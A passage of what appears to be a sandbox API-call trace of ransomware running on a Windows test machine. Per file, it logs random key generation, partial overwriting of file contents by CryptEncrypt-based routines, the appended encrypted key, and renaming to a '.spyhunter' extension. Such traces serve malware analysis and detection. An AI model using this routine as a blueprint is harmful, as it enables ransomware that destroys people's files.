liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0139.080] WriteFile (in: hFile=0x184, lpBuffer=0x57f31c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57f2dc, lpOverlapped=0x0 | out: lpBuffer=0x57f31c*, lpNumberOfBytesWritten=0x57f2dc*=0x4, lpOverlapped=0x0) returned 1 [0139.080] WriteFile (in: hFile=0x184, lpBuffer=0x31f020*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57f2dc, lpOverlapped=0x0 | out: lpBuffer=0x31f020*, lpNumberOfBytesWritten=0x57f2dc*=0x30, lpOverlapped=0x0) returned 1 [0139.080] CloseHandle (hObject=0x184) returned 1 [0139.080] GetProcessHeap () returned 0x2c0000 [0139.080] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2ff5a50 [0139.081] wnsprintfW (in: pszDest=0x2ff5a50, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\ShadesOfBlue.jpg.spyhunter") returned 108 [0139.081] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\ShadesOfBlue.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows mail\\stationery\\shadesofblue.jpg"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\ShadesOfBlue.jpg.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows mail\\stationery\\shadesofblue.jpg.spyhunter")) returned 1 [0139.081] GetProcessHeap () returned 0x2c0000 [0139.081] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ff5a50 | out: hHeap=0x2c0000) returned 1 [0139.081] GetProcessHeap () returned 0x2c0000 [0139.081] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0139.081] GetProcessHeap () returned 0x2c0000 [0139.081] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f2b988 | out: hHeap=0x2c0000) returned 1 [0139.081] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57f320 | out: pbBuffer=0x57f320) returned 1 [0139.082] GetProcessHeap () returned 0x2c0000 [0139.082] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0139.082] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x57f318*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x57f318*=0x30) returned 1 [0139.082] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Shades of Blue.htm" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows mail\\stationery\\shades of blue.htm"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x184 [0139.082] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Shades of Blue.htm") returned 100 [0139.082] StrStrW (lpFirst="Shades of Blue.htm", lpSrch=".txt") returned 0x0 [0139.082] GetProcessHeap () returned 0x2c0000 [0139.082] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0139.082] ReadFile (in: hFile=0x184, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57f2dc, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x57f2dc*=0xed, lpOverlapped=0x0) returned 1 [0139.083] SetFilePointerEx (in: hFile=0x184, liDistanceToMove=0xffffff13, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0139.083] WriteFile (in: hFile=0x184, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0xed, lpNumberOfBytesWritten=0x57f2dc, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x57f2dc*=0xed, lpOverlapped=0x0) returned 1 [0139.083] GetProcessHeap () returned 0x2c0000 [0139.083] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0139.083] SetFilePointerEx (in: hFile=0x184, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0139.083] WriteFile (in: hFile=0x184, lpBuffer=0x57f31c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57f2dc, lpOverlapped=0x0 | out: lpBuffer=0x57f31c*, lpNumberOfBytesWritten=0x57f2dc*=0x4, lpOverlapped=0x0) returned 1 [0139.084] WriteFile (in: hFile=0x184, lpBuffer=0x31f020*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57f2dc, lpOverlapped=0x0 | out: lpBuffer=0x31f020*, lpNumberOfBytesWritten=0x57f2dc*=0x30, lpOverlapped=0x0) returned 1 [0139.084] CloseHandle (hObject=0x184) returned 1 [0139.084] GetProcessHeap () returned 0x2c0000 [0139.084] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2ff5a50 [0139.084] wnsprintfW (in: pszDest=0x2ff5a50, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Shades of Blue.htm.spyhunter") returned 110 [0139.084] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Shades of Blue.htm" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows mail\\stationery\\shades of blue.htm"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Shades of Blue.htm.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows mail\\stationery\\shades of blue.htm.spyhunter")) returned 1 [0139.085] GetProcessHeap () returned 0x2c0000 [0139.085] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ff5a50 | out: hHeap=0x2c0000) returned 1 [0139.085] GetProcessHeap () returned 0x2c0000 [0139.085] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0139.085] GetProcessHeap () returned 0x2c0000 [0139.085] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f2b870 | out: hHeap=0x2c0000) returned 1 [0139.085] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57f318 | out: pbBuffer=0x57f318) returned 1 [0139.085] GetProcessHeap () returned 0x2c0000 [0139.085] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0139.085] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x57f310*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x57f310*=0x30) returned 1 [0139.085] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Roses.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows mail\\stationery\\roses.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x184 [0139.086] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Roses.jpg") returned 91 [0139.086] StrStrW (lpFirst="Roses.jpg", lpSrch=".txt") returned 0x0 [0139.086] GetProcessHeap () returned 0x2c0000 [0139.086] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0139.086] ReadFile (in: hFile=0x184, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57f2d4, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x57f2d4*=0x780, lpOverlapped=0x0) returned 1 [0139.161] SetFilePointerEx (in: hFile=0x184, liDistanceToMove=0xfffff880, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0139.161] WriteFile (in: hFile=0x184, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0x780, lpNumberOfBytesWritten=0x57f2d4, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x57f2d4*=0x780, lpOverlapped=0x0) returned 1 [0139.161] GetProcessHeap () returned 0x2c0000 [0139.161] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0139.161] SetFilePointerEx (in: hFile=0x184, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0139.161] WriteFile (in: hFile=0x184, lpBuffer=0x57f314*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57f2d4, lpOverlapped=0x0 | out: lpBuffer=0x57f314*, lpNumberOfBytesWritten=0x57f2d4*=0x4, lpOverlapped=0x0) returned 1 [0139.161] WriteFile (in: hFile=0x184, lpBuffer=0x31f020*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57f2d4, lpOverlapped=0x0 | out: lpBuffer=0x31f020*, lpNumberOfBytesWritten=0x57f2d4*=0x30, lpOverlapped=0x0) returned 1 [0139.161] CloseHandle (hObject=0x184) returned 1 [0139.161] GetProcessHeap () returned 0x2c0000 [0139.162] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2f92e30 [0139.162] wnsprintfW (in: pszDest=0x2f92e30, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Roses.jpg.spyhunter") returned 101 [0139.162] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Roses.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows mail\\stationery\\roses.jpg"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Roses.jpg.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows mail\\stationery\\roses.jpg.spyhunter")) returned 1 [0139.162] GetProcessHeap () returned 0x2c0000 [0139.162] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f92e30 | out: hHeap=0x2c0000) returned 1 [0139.162] GetProcessHeap () returned 0x2c0000 [0139.162] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0139.162] GetProcessHeap () returned 0x2c0000 [0139.162] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f45b28 | out: hHeap=0x2c0000) returned 1 [0139.164] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57f310 | out: pbBuffer=0x57f310) returned 1 [0139.171] GetProcessHeap () returned 0x2c0000 [0139.171] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0139.172] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x57f308*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x57f308*=0x30) returned 1 [0139.172] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\E\\69\\885EEd01" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\firefox\\profiles\\silmbjec.default\\cache\\e\\69\\885eed01"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x184 [0139.172] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\E\\69\\885EEd01") returned 109 [0139.172] StrStrW (lpFirst="885EEd01", lpSrch=".txt") returned 0x0 [0139.172] GetProcessHeap () returned 0x2c0000 [0139.172] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0139.172] ReadFile (in: hFile=0x184, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57f2cc, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x57f2cc*=0x2800, lpOverlapped=0x0) returned 1 [0139.231] SetFilePointerEx (in: hFile=0x184, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0139.231] WriteFile (in: hFile=0x184, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x57f2cc, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x57f2cc*=0x2800, lpOverlapped=0x0) returned 1 [0139.231] GetProcessHeap () returned 0x2c0000 [0139.231] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0139.231] SetFilePointerEx (in: hFile=0x184, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0139.231] WriteFile (in: hFile=0x184, lpBuffer=0x57f30c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57f2cc, lpOverlapped=0x0 | out: lpBuffer=0x57f30c*, lpNumberOfBytesWritten=0x57f2cc*=0x4, lpOverlapped=0x0) returned 1 [0139.296] WriteFile (in: hFile=0x184, lpBuffer=0x31f020*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57f2cc, lpOverlapped=0x0 | out: lpBuffer=0x31f020*, lpNumberOfBytesWritten=0x57f2cc*=0x30, lpOverlapped=0x0) returned 1 [0139.297] CloseHandle (hObject=0x184) returned 1 [0139.297] GetProcessHeap () returned 0x2c0000 [0139.297] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2f07c68 [0139.297] wnsprintfW (in: pszDest=0x2f07c68, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\E\\69\\885EEd01.spyhunter") returned 119 [0139.297] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\E\\69\\885EEd01" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\firefox\\profiles\\silmbjec.default\\cache\\e\\69\\885eed01"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\E\\69\\885EEd01.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\firefox\\profiles\\silmbjec.default\\cache\\e\\69\\885eed01.spyhunter")) returned 1 [0139.301] GetProcessHeap () returned 0x2c0000 [0139.301] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f07c68 | out: hHeap=0x2c0000) returned 1 [0139.301] GetProcessHeap () returned 0x2c0000 [0139.301] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0139.301] GetProcessHeap () returned 0x2c0000 [0139.301] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fbd520 | out: hHeap=0x2c0000) returned 1 [0139.305] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57f300 | out: pbBuffer=0x57f300) returned 1 [0139.305] GetProcessHeap () returned 0x2c0000 [0139.305] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0139.305] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x57f2f8*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x57f2f8*=0x30) returned 1 [0139.305] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\_AYbZ0b f7blTBH.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\_aybz0b f7bltbh.mp3"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x184 [0139.306] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\_AYbZ0b f7blTBH.mp3") returned 72 [0139.306] StrStrW (lpFirst="_AYbZ0b f7blTBH.mp3", lpSrch=".txt") returned 0x0 [0139.306] GetProcessHeap () returned 0x2c0000 [0139.306] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0139.306] ReadFile (in: hFile=0x184, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57f2bc, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x57f2bc*=0x2800, lpOverlapped=0x0) returned 1 [0139.307] SetFilePointerEx (in: hFile=0x184, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0139.307] WriteFile (in: hFile=0x184, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x57f2bc, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x57f2bc*=0x2800, lpOverlapped=0x0) returned 1 [0139.307] GetProcessHeap () returned 0x2c0000 [0139.307] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0139.307] SetFilePointerEx (in: hFile=0x184, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0139.307] WriteFile (in: hFile=0x184, lpBuffer=0x57f2fc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57f2bc, lpOverlapped=0x0 | out: lpBuffer=0x57f2fc*, lpNumberOfBytesWritten=0x57f2bc*=0x4, lpOverlapped=0x0) returned 1 [0139.307] WriteFile (in: hFile=0x184, lpBuffer=0x31f020*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57f2bc, lpOverlapped=0x0 | out: lpBuffer=0x31f020*, lpNumberOfBytesWritten=0x57f2bc*=0x30, lpOverlapped=0x0) returned 1 [0139.307] CloseHandle (hObject=0x184) returned 1 [0139.308] GetProcessHeap () returned 0x2c0000 [0139.308] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2f07c68 [0139.308] wnsprintfW (in: pszDest=0x2f07c68, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\_AYbZ0b f7blTBH.mp3.spyhunter") returned 82 [0139.308] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\_AYbZ0b f7blTBH.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\_aybz0b f7bltbh.mp3"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\_AYbZ0b f7blTBH.mp3.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\_aybz0b f7bltbh.mp3.spyhunter")) returned 1 [0139.309] GetProcessHeap () returned 0x2c0000 [0139.309] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f07c68 | out: hHeap=0x2c0000) returned 1 [0139.309] GetProcessHeap () returned 0x2c0000 [0139.309] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0139.309] GetProcessHeap () returned 0x2c0000 [0139.309] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2eb51f8 | out: hHeap=0x2c0000) returned 1 [0139.310] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57f2f8 | out: pbBuffer=0x57f2f8) returned 1 [0139.310] GetProcessHeap () returned 0x2c0000 [0139.310] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0139.310] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x57f2f0*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x57f2f0*=0x30) returned 1 [0139.310] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\XVIxBvrbtf2R.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\xvixbvrbtf2r.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x184 [0139.310] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\XVIxBvrbtf2R.gif") returned 69 [0139.310] StrStrW (lpFirst="XVIxBvrbtf2R.gif", lpSrch=".txt") returned 0x0 [0139.310] GetProcessHeap () returned 0x2c0000 [0139.310] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0139.311] ReadFile (in: hFile=0x184, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57f2b4, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x57f2b4*=0x100c, lpOverlapped=0x0) returned 1 [0139.311] SetFilePointerEx (in: hFile=0x184, liDistanceToMove=0xffffeff4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0139.311] WriteFile (in: hFile=0x184, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0x100c, lpNumberOfBytesWritten=0x57f2b4, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x57f2b4*=0x100c, lpOverlapped=0x0) returned 1 [0139.312] GetProcessHeap () returned 0x2c0000 [0139.312] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0139.312] SetFilePointerEx (in: hFile=0x184, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0139.312] WriteFile (in: hFile=0x184, lpBuffer=0x57f2f4*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57f2b4, lpOverlapped=0x0 | out: lpBuffer=0x57f2f4*, lpNumberOfBytesWritten=0x57f2b4*=0x4, lpOverlapped=0x0) returned 1 [0139.312] WriteFile (in: hFile=0x184, lpBuffer=0x31f020*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57f2b4, lpOverlapped=0x0 | out: lpBuffer=0x31f020*, lpNumberOfBytesWritten=0x57f2b4*=0x30, lpOverlapped=0x0) returned 1 [0139.312] CloseHandle (hObject=0x184) returned 1 [0139.312] GetProcessHeap () returned 0x2c0000 [0139.312] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2f07c68 [0139.312] wnsprintfW (in: pszDest=0x2f07c68, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\XVIxBvrbtf2R.gif.spyhunter") returned 79 [0139.312] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\XVIxBvrbtf2R.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\xvixbvrbtf2r.gif"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\XVIxBvrbtf2R.gif.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\xvixbvrbtf2r.gif.spyhunter")) returned 1 [0139.313] GetProcessHeap () returned 0x2c0000 [0139.313] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f07c68 | out: hHeap=0x2c0000) returned 1 [0139.313] GetProcessHeap () returned 0x2c0000 [0139.313] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0139.313] GetProcessHeap () returned 0x2c0000 [0139.313] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c811e0 | out: hHeap=0x2c0000) returned 1 [0139.317] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57f2f0 | out: pbBuffer=0x57f2f0) returned 1 [0139.317] GetProcessHeap () returned 0x2c0000 [0139.317] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0139.317] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x57f2e8*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x57f2e8*=0x30) returned 1 [0139.317] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\VEjG.swf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\vejg.swf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x184 [0139.317] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\VEjG.swf") returned 61 [0139.318] StrStrW (lpFirst="VEjG.swf", lpSrch=".txt") returned 0x0 [0139.318] GetProcessHeap () returned 0x2c0000 [0139.318] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0139.318] ReadFile (in: hFile=0x184, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57f2ac, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x57f2ac*=0x2800, lpOverlapped=0x0) returned 1 [0139.319] SetFilePointerEx (in: hFile=0x184, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0139.319] WriteFile (in: hFile=0x184, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x57f2ac, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x57f2ac*=0x2800, lpOverlapped=0x0) returned 1 [0139.319] GetProcessHeap () returned 0x2c0000 [0139.319] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, 